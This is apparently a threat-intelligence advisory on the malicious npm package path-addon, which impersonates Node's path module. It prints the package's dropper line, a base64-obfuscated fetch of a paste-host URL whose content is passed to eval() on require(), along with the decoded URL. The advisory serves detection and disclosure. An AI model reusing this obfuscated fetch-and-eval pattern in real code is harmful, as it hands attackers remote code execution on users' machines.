Supply-chain threat intelligence
Risk score: 92
Indexed incident for path-addon (npm).
path-addon impersonates the Node.js core path module (package name path-addon, README claims to be 'an exact copy of the NodeJS path module'). The body of path.js is the genuine Joyent path implementation, but a remote-code-execution dropper has been inserted: on require(), the module calls fetch(atob("aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9SRlc2SQ==")) — which decodes to https://www.jsonkeeper.com/b/RFW6I, an anonymous mutable JSON paste host — then reads the response's content field and passes it to eval(). The destination URL is base64-encoded specifically to evade casual review and string-based scanners. Any process that imports path-addon executes whatever JavaScript the attacker has placed at that paste URL at the moment of require(), with no integrity check, no pinning, and no version constraint. The combined shape (typosquat name + trojanized legitimate source + obfuscated fetch + eval of remote content at module load) is unambiguous attacker tooling.
The OpenSSF Package Analysis project identified 'path-addon' @ 1.0.4 (npm) as malicious.
It is considered malicious because:
The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.
Affected versions
Indicators
Timeline